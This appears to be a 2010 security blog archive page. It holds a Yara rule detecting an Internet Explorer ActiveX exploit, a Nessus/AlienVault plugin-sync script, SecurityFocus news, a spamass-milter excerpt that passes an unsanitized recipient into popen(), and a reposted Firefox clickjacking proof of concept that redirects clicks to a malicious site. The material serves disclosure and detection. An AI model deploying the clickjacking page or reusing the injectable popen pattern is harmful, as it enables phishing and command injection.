Posted: April 6th, 2010 | Author: xanda | Filed under: IT Related | Tags: ActiveX, CVE-2010-0805, detection, internet explorer, jsunpack, Tabular Data Control, yara | 9 Comments »
Internet Explorer Tabular Data Control ActiveX Memory Corruption CVE-2010-0805 ported to Metasploit, so I decided to release the detection rule for Yara
rule MSIETabularActivex
{
meta:
ref = "CVE-2010-0805"
impact = 7
hide = true
strings:
$cve20100805_1 = "333C7BC4-460F-11D0-BC04-0080C7055A83" nocase fullword
$cve20100805_2 = "DataURL" nocase fullword
$cve20100805_3 = /value\=\"http:\/\/(.*?)\"/ nocase fullword
condition:
($cve20100805_1 and $cve20100805_3) or (all of them)
} |
rule MSIETabularActivex
{
meta:
ref = "CVE-2010-0805"
impact = 7
hide = true
strings:
$cve20100805_1 = "333C7BC4-460F-11D0-BC04-0080C7055A83" nocase fullword
$cve20100805_2 = "DataURL" nocase fullword
$cve20100805_3 = /value\=\"http:\/\/(.*?)\"/ nocase fullword
condition:
($cve20100805_1 and $cve20100805_3) or (all of them)
}
Credit:
- ZSploit.com
- Metasploit
- @d3t0n4t0r
Posted: March 21st, 2010 | Author: xanda | Filed under: IT Related | Tags: alienvault, macos, nessus, nvt, openvast, snow leopard | 6 Comments »
Here is my simple howto and modified AlienVault NVT sync script to be use with Nessus 4 on Mac OS
First thing first, you need to have Nessus and MacPorts installed
Then install the md5sha1sum package
sudo port install md5sha1sum |
sudo port install md5sha1sum
Use the following modified script and let it automagically fetch the NVT feed for you
#!/bin/bash
#
# OpenVAS
# Description: Synchronize with with NVT feed.
# This shell script synchronizes the local set of
# OpenVAS Network Vulerability Tests (NVTs) and
# associated includefiles with a given upstream
# feed of updated or new files.
#
# Authors:
# Lukas Grunwald <l.grunwald@dn-systems.de>
# Jan-Oliver Wagner <jan-oliver.wagner@intevation.de>
# xanda <adnanDOTshukorATgmailDOTcom>
#
# Copyright DN-Systems Enterprise Internet Solutions GmbH 2007
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Slight modifications, 2008/07 AlienVault VRT - code@alienvault.com
# Slight modifications, 2008/08 Vlatko Kosturjak Kost <kostATlinuxDOThr>
# Slight modifications, 2010/03 xanda - adnanDOTshukorATgmailDOTcom
SCANNER=$1
if [ "x$SCANNER" = "x" ]
then
echo "Usage: $0 nessus"
exit
fi
if [ ! $SCANNER = "nessus" ]
then
echo "Usage: $0 nessus"
exit
fi
# Plugin dir
if [ "x$NVT_DIR" = "x" ]; then
# Plugin dir
if [ $SCANNER = "nessus" ]; then
NVT_DIR="/Library/Nessus/run/lib/nessus/plugins"
fi
fi
# The URL of the plugin feed
FEED=rsync://feed.alienvault.com:/nvt-feed
findcmd()
{
CMD=$1
SRCH=/usr/bin:/usr/ucb:/usr/sbin:/sw/bin:/sbin:/usr/local/bin:/usr/local/sbin:/opt/local/bin:/opt/local/sbin
SAVEIFS=$IFS
IFS=:
set $SRCH
IFS=$SAVEIFS
for dir
do
[ -x $dir/$CMD ] && {
echo $dir/$CMD
return
}
done
}
chk_system_tools(){
echo "Searching for required system tools ..."
RSYNC=`findcmd rsync`
MD5SUM=`findcmd md5sum`
if [ -z "$RSYNC" ]; then
echo "Error: RSYNC not found";
exit -1
fi
if [ -z "$MD5SUM" ]; then
echo "Error: MD5SUM not found";
exit -1
fi
}
sync_nvts (){
echo "Synchonizing NVTs via RSYNC ..."
mkdir -p "$NVT_DIR"
eval "rsync -av --progress \"$FEED\" \"$NVT_DIR\""
echo "Synchronization successful."
}
echo "AlienVault NVT Feed Sync"
echo " "
echo "Configured Scanner: $SCANNER"
echo "Configured NVT Feed: $FEED"
echo "Synchronized into: $NVT_DIR"
echo " "
echo " "
chk_system_tools
sync_nvts
echo " "
echo " "
echo "Please restart your scanner daemon" |
#!/bin/bash
#
# OpenVAS
# Description: Synchronize with with NVT feed.
# This shell script synchronizes the local set of
# OpenVAS Network Vulerability Tests (NVTs) and
# associated includefiles with a given upstream
# feed of updated or new files.
#
# Authors:
# Lukas Grunwald <l.grunwald@dn-systems.de>
# Jan-Oliver Wagner <jan-oliver.wagner@intevation.de>
# xanda <adnanDOTshukorATgmailDOTcom>
#
# Copyright DN-Systems Enterprise Internet Solutions GmbH 2007
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Slight modifications, 2008/07 AlienVault VRT - code@alienvault.com
# Slight modifications, 2008/08 Vlatko Kosturjak Kost <kostATlinuxDOThr>
# Slight modifications, 2010/03 xanda - adnanDOTshukorATgmailDOTcom
SCANNER=$1
if [ "x$SCANNER" = "x" ]
then
echo "Usage: $0 nessus"
exit
fi
if [ ! $SCANNER = "nessus" ]
then
echo "Usage: $0 nessus"
exit
fi
# Plugin dir
if [ "x$NVT_DIR" = "x" ]; then
# Plugin dir
if [ $SCANNER = "nessus" ]; then
NVT_DIR="/Library/Nessus/run/lib/nessus/plugins"
fi
fi
# The URL of the plugin feed
FEED=rsync://feed.alienvault.com:/nvt-feed
findcmd()
{
CMD=$1
SRCH=/usr/bin:/usr/ucb:/usr/sbin:/sw/bin:/sbin:/usr/local/bin:/usr/local/sbin:/opt/local/bin:/opt/local/sbin
SAVEIFS=$IFS
IFS=:
set $SRCH
IFS=$SAVEIFS
for dir
do
[ -x $dir/$CMD ] && {
echo $dir/$CMD
return
}
done
}
chk_system_tools(){
echo "Searching for required system tools ..."
RSYNC=`findcmd rsync`
MD5SUM=`findcmd md5sum`
if [ -z "$RSYNC" ]; then
echo "Error: RSYNC not found";
exit -1
fi
if [ -z "$MD5SUM" ]; then
echo "Error: MD5SUM not found";
exit -1
fi
}
sync_nvts (){
echo "Synchonizing NVTs via RSYNC ..."
mkdir -p "$NVT_DIR"
eval "rsync -av --progress \"$FEED\" \"$NVT_DIR\""
echo "Synchronization successful."
}
echo "AlienVault NVT Feed Sync"
echo " "
echo "Configured Scanner: $SCANNER"
echo "Configured NVT Feed: $FEED"
echo "Synchronized into: $NVT_DIR"
echo " "
echo " "
chk_system_tools
sync_nvts
echo " "
echo " "
echo "Please restart your scanner daemon"
chmod +x alienvault-nvt-feed.sh |
chmod +x alienvault-nvt-feed.sh
Make sure you stop the Nessus server first before run the script!
sudo ./alienvault-nvt-feed.sh nessus |
sudo ./alienvault-nvt-feed.sh nessus
Enjoy! 😉
Posted: March 11th, 2010 | Author: xanda | Filed under: IT Related | Tags: securityfocus, Symantec | 1 Comment »
Beginning March 15, 2010 SecurityFocus will begin a transition of its content to Symantec Connect. As part of its continued commitment to the community, all of SecurityFocus’ mailing lists including Bugtraq and its Vulnerability Database will remain online at www.securityfocus.com There will not be any changes to any of the list charters or policies and the same teams who have moderated list traffic will continue to do so. The vulnerability database will continue to be updated and made available as it is currently. DeepSight and other security intelligence related offerings will remain unchanged while Infocus articles, whitepapers, and other SecurityFocus content will be available off of the main Symantec website in the coming months.
Read more HERE
Posted: March 9th, 2010 | Author: xanda | Filed under: IT Related | Tags: Bugtraq ID 38578, exploit, remote, SpamAssassin | No Comments »
Can you spot the security bug? 🙂
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
struct context *sctx = (struct context*)smfi_getpriv(ctx);
SpamAssassin* assassin = sctx->assassin;
FILE *p;
#if defined(__FreeBSD__)
int rv;
#endif
debug(D_FUNC, "mlfi_envrcpt: enter");
if (flag_expand)
{
/* open a pipe to sendmail so we can do addressexpansion */
char buf[1024];
char *fmt="%s -bv \"%s\" 2>&1";
#if defined(HAVE_SNPRINTF)
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif
debug(D_RCPT, "calling %s", buf);
#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
rv = pthread_mutex_lock(&popen_mutex);
if (rv)
{
debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
abort();
}
#endif
p = popen(buf, "r");
if (!p)
{
debug(D_RCPT, "popen failed(%s). Will not expand aliases", strerror(errno));
assassin->expandedrcpt.push_back(envrcpt[0]); |
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
struct context *sctx = (struct context*)smfi_getpriv(ctx);
SpamAssassin* assassin = sctx->assassin;
FILE *p;
#if defined(__FreeBSD__)
int rv;
#endif
debug(D_FUNC, "mlfi_envrcpt: enter");
if (flag_expand)
{
/* open a pipe to sendmail so we can do addressexpansion */
char buf[1024];
char *fmt="%s -bv \"%s\" 2>&1";
#if defined(HAVE_SNPRINTF)
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif
debug(D_RCPT, "calling %s", buf);
#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
rv = pthread_mutex_lock(&popen_mutex);
if (rv)
{
debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
abort();
}
#endif
p = popen(buf, "r");
if (!p)
{
debug(D_RCPT, "popen failed(%s). Will not expand aliases", strerror(errno));
assassin->expandedrcpt.push_back(envrcpt[0]);
Posted: February 26th, 2010 | Author: xanda | Filed under: IT Related | Tags: clickjacking, firefox, full disclosure, mozilla | 2 Comments »
I was about to shutdown my machine and go to sleep but suddenly my RSS reader popping up new feeds.
Here is one thing that made me smile:
Mozilla firefox 3.6 unpatched phishing vulnerability
From: bugsbanned () hushmail com
Date: Wed, 24 Feb 2010 19:29:33 -0300
…Unpatched bug since Mozilla firefox 3.0…
Mozilla “INsecurity team” remember, security through obscurity just
DOESN’T WORK…
Locking down bugzilla advisories even the 2 years old ones is
unnecessary and lame.
<html>
<body>
<div id=”mydiv”
onmouseover=”document.location=’http://Maliciouswebsite’;”
style=”position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px”></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(‘mydiv’).style.left=mouseX-1;
document.getElementById(‘mydiv’).style.top=mouseY-1;
}
</script>
<br>
<a href=”http://trustedwebsite”; onclick=”updatebox(event)”><font
style=”font-family:arial;font-size:32px”>http://trusted
website</font></a><br>
</div>
</body>
</html>
For example:
<html>
<body>
<div id=”mydiv”
onmouseover=”document.location=’http://www.wikipedia.org’;”
style=”position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px”></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(‘mydiv’).style.left=mouseX-1;
document.getElementById(‘mydiv’).style.top=mouseY-1;
}
</script>
<br>
<a href=”http://www.google.com”; onclick=”updatebox(event)”><font
style=”font-family:arial;font-
size:32px”>http://www.google.com</font></a><br>
</div>
</body>
</html>
Source:www exploit-db com
Phishing huh? To me its clickjacking 🙂
Source: http://seclists.org/fulldisclosure/2010/Feb/434
P/S: Owh ya, NoScript is one of my best friend and he wants to be your best friend to 😉